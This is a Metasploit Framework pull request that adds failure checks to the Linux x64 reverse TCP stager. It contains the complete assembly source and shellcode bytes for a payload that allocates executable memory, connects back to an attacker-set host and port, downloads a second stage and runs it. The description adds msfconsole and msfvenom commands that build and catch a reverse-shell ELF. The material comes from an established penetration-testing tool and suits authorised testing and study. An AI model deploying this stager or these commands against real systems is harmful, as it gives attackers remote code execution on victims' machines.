### PR TITLE
add error handling to x64 reverse tcp stager

### DIFF
--- a/external/source/shellcode/linux/x64/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/x64/stager_sock_reverse.s
@@ -1,0 +1,75 @@
+##
+#
+#        Name: stager_sock_reverse
+#   Qualities: -
+#     Authors: nemo <nemo [at] felinemenace.org>, tkmru
+#     License: MSF_LICENSE
+# Description:
+#
+#        Implementation of a Linux reverse TCP stager for x64 architecture.
+#
+#        Assemble with: gcc -nostdlib stager_sock_reverse.s -o stager_sock_reverse
+#
+# Meta-Information:
+#
+# meta-shortname=Linux Reverse TCP Stager
+# meta-description=Connect back to the framework and run a second stage
+# meta-authors=ricky, tkmru
+# meta-os=linux
+# meta-arch=x64
+# meta-category=stager
+# meta-connection-type=reverse
+# meta-name=reverse_tcp
+##
+
+.text
+.globl _start
+_start:
+  xor    %rdi,%rdi
+  pushq  $0x9
+  pop    %rax
+  cltd
+  mov    $0x10,%dh
+  mov    %rdx,%rsi
+  xor    %r9,%r9
+  pushq  $0x22
+  pop    %r10
+  mov    $0x7,%dl
+  syscall
+  test %rax, %rax
+  js failed
+  # mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
+  push   %rsi
+  push   %rax
+  pushq  $0x29
+  pop    %rax
+  cltd
+  pushq  $0x2
+  pop    %rdi
+  pushq  $0x1
+  pop    %rsi
+  syscall
+  # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
+  test %rax, %rax
+  js failed
+  xchg   %rax,%rdi
+  movabs $0x100007fb3150002,%rcx
+  push   %rcx
+  mov    %rsp,%rsi
+  pushq  $0x10
+  pop    %rdx
+  pushq  $0x2a
+  pop    %rax
+  syscall
+  # connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
+  test   %rax, %rax
+  js     failed
+  pop    %rcx
+
+failed:
+  pushq  $0x3c
+  pop    %rax
+  pushq  $0x1
+  pop    %rdi
+  syscall
+  # exit(1)

--- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
@@ -17,7 +17,7 @@ module MetasploitModule
     super(merge_info(info,
       'Name'          => 'Reverse TCP Stager',
       'Description'   => 'Connect back to the attacker',
-      'Author'        => 'ricky',
+      'Author'        => ['ricky', 'tkmru'],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
       'Arch'          => ARCH_X64,
@@ -26,8 +26,8 @@ module MetasploitModule
         {
           'Offsets' =>
             {
-              'LHOST' => [ 45, 'ADDR' ],
-              'LPORT' => [ 43, 'n'    ],
+              'LHOST' => [ 55, 'ADDR' ],
+              'LPORT' => [ 53, 'n'    ],
             },
           'Payload' =>
             "\x48\x31\xff"                 + # xor    %rdi,%rdi
@@ -42,6 +42,8 @@ module MetasploitModule
             "\xb2\x07"                     + # mov    $0x7,%dl
             "\x0f\x05"                     + # syscall
             # mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
+            "\x48\x85\xc0"                 + # test   %rax,%rax
+            "\x78\x3c"                     + # js     40012c <failed>
             "\x56"                         + # push   %rsi
             "\x50"                         + # push   %rax
             "\x6a\x29"                     + # pushq  $0x29
@@ -53,6 +55,8 @@ module MetasploitModule
             "\x5e"                         + # pop    %rsi
             "\x0f\x05"                     + # syscall
             # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
+            "\x48\x85\xc0"                 + # test   %rax,%rax
+            "\x78\x29"                     + # js     40012c <failed>
             "\x48\x97"                     + # xchg   %rax,%rdi
             "\x48\xb9\x02\x00"             + # movabs $0x100007fb3150002,%rcx
             "\x15\xb3"                     + # LPORT
@@ -65,12 +69,23 @@ module MetasploitModule
             "\x58"                         + # pop    %rax
             "\x0f\x05"                     + # syscall
             # connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
+            "\x48\x85\xc0"                 + # test   %rax,%rax
+            "\x78\x0c"                     + # js     40012c <failed>
             "\x59"                         + # pop    %rcx
             "\x5e"                         + # pop    %rsi
             "\x5a"                         + # pop    %rdx
             "\x0f\x05"                     + # syscall
             # read(3, "", 4096)
-            "\xff\xe6"                       # jmpq   *%rsi
+            "\x48\x85\xc0"                 + # test   %rax,%rax
+            "\x78\x02"                     + # js     40012c <failed>
+            "\xff\xe6"                     + # jmpq   *%rsi
+            # 40012c <failed>:
+            "\x6a\x3c"                     + # pushq  $0x3c
+            "\x58"                         + # pop    %rax
+            "\x6a\x01"                     + # pushq  $0x1
+            "\x5f"                         + # pop    %rdi
+            "\x0f\x05"                       #syscall
+            # exit(1)
         }
       ))
   end

--- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 68
+  CachedSize = 96
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux

--- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
@@ -30,6 +30,7 @@ module MetasploitModule
               'LPORT' => [ 53, 'n'    ],
             },
           'Payload' =>
+            # Generated from external/source/shellcode/linux/x64/stager_sock_reverse.s
             "\x48\x31\xff"                 + # xor    %rdi,%rdi
             "\x6a\x09"                     + # pushq  $0x9
             "\x58"                         + # pop    %rax


### PR DESCRIPTION
I add error handling to x64 linux reverse tcp stager. for [Linux reverse_tcp stager segfaults when it can't connect · Issue #7722 · rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/issues/7722).

## Verification

List the steps needed to make sure this thing works

- [x] ./msfconsole -qx "use exploit/multi/handler; set payload linux/x64/shell/reverse_tcp; set lhost IP_ADDR; set lport PORT_NUMBER; set ExitOnSession false; run -j"
- [x] follow commands

```
$ ./msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.132.1 LPORT=5555 -f elf -o ./reverse_tcp
$ sudo chmod +x ./reverse_tcp
$ strace ./reverse_tcp 
execve("./reverse_tcp", ["./reverse_tcp"], [/* 14 vars */]) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0x7fdf9a7ac000
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(5555), sin_addr=inet_addr("192.168.132.1")}, 16) = -1 ECONNREFUSED (Connection refused)
_exit(1)                                = ?
+++ exited with 1 +++
```